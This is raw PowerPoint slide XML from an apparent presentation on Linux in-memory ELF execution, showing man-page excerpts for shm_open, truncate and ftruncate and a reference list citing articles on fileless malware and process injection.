                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>had returned a file-descriptor instead of a pointer. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Note that even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shm_open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/dev/</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shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to be a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmpfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-mount. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Furthermore, the backing-memory is accounted to the process that owns the file and is not subject to mount-quotas.</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87</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Property 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David Herrmann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39822262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7"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>types.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> truncate(</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const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>path</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off_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>length</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br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</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ftruncate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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>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off_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>length</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endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>truncate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,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ftruncate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>die.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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88</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9256198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948405" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>truncate()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and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ftruncate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functions cause the regular file named by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or referenced by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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to be truncated to a size of precisely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If the file previously was larger than this size, the extra data is lost. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If the file previously was shorter, it is extended, and the extended part reads as null bytes ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>').</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>die.net</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89</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15373182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With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ftruncate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, the file must be open for writing; with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>truncate()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, the file must be writable.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Caution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>die.net</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90</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37580464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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Reference</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600"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91</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16886334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814733" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware on Linux: Anatomy of an Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Guardian Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>In-Memory-Only ELF Execution (Without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmpfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux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ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> introduction AKA injecting into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for fun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Adam Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Malware using new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ezuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> memory loader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Ofer Caspi and Fernando Martinez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>無檔案滲透執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>ITW01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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92</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35592298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79513" y="2492896"/>
